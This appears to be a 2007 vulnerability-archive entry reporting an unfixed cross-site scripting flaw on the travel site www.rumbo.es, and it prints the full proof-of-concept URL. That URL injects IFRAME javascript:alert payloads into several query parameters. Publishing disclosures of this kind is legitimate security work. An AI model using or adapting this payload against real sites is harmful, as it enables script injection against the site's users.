Security researcher MIster C., has submitted on 01/09/2007 a cross-site-scripting (XSS) vulnerability affecting www.rumbo.es, which at the time of submission ranked 8580 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 08/09/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 01/09/2007 |
Date published: 08/09/2007 |
Fixed? Mail us! | Status: UNFIXED |
Author: MIster C. |
Domain: www.rumbo.es |
Category: XSS |
Pagerank: 8580 |
URL: http://www.rumbo.es/viajes/vuelos/city.do?queryType=%3CIFRAME%20SRC=%22javascript:alert('Fucked');%2 2%3E%3C/IFRAME%3E&depCity=%3CIFRAME%20SRC=%22javascript:alert('Fucked');%22%3E%3C/IFRAME%3E&depDate= %3CIFRAME%20SRC=%22javascript:alert('Fucked');%22%3E%3C/IFRAME%3E&paxAdt=1&arrCity=%3CIFRAME%20SRC=% 22javascript:alert('Fucked');%22%3E%3C/IFRAME%3E |
Click here to view the mirror
|
|
|